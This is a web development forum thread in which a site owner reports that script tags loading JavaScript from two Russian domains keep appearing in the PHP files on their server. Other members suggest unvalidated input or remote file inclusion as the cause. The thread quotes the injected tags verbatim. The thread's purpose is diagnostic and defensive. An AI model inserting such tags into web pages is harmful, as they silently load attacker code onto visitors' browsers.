www.webdeveloper.com
Results 1 to 4 of 4

Thread: script added to files automatically

  1. #1
    Join Date
    Sep 2008
    Posts
    2

    script added to files automatically

    Erroneous redirection script was added in to the PHP files on the server..

    1st time, the script was:

    <script src=http://www.vtg43.ru/script.js></script>

    i modified the files, removed them, changed all my passwords, including FTP.

    but again the second time, script was added automatically to files. this time it was,

    ]<script src=http://www.pkseio.ru/script.js></script>

    when i checked out on net, i found out that these are sites related to SQL-injection attack.

    please help me out. y is this happeneng and how to prevent it...

  2. #2
    Join Date
    Mar 2007
    Location
    Orlando
    Posts
    670
    Sounds like you have a form that is not doing any validation. Do you have content being pulled from a database?

  3. #3
    Join Date
    Aug 2004
    Location
    Ankh-Morpork
    Posts
    18,924
    Does any page on your site do an include() or require() based on a URL or form value? If so, if you do not properly validate/filter that value, it's relatively easy to make the page include a remote file that could do all sorts of things, such as injecting links into all of your pages. (This is one reason that many hosts disable the allow_url_fopen PHP option.)
    "Please give us a simple answer, so that we don't have to think, because if we think, we might find answers that don't fit the way we want the world to be."
    ~ Terry Pratchett in Nation

    eBookworm.us

  4. #4
    Join Date
    Sep 2008
    Posts
    2
    well, i do have to get data from the dabase. but i checked the database for any erroneous injections but did not find anything fishy..

    regarding includes, i have used includes but that is for my functions wit a file on my own server..havn't used require() though..
    thanx for your replies friends..i wish my problem is solved as soon as possible..waiting for further replies

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  
HTML5 Development Center



Recent Articles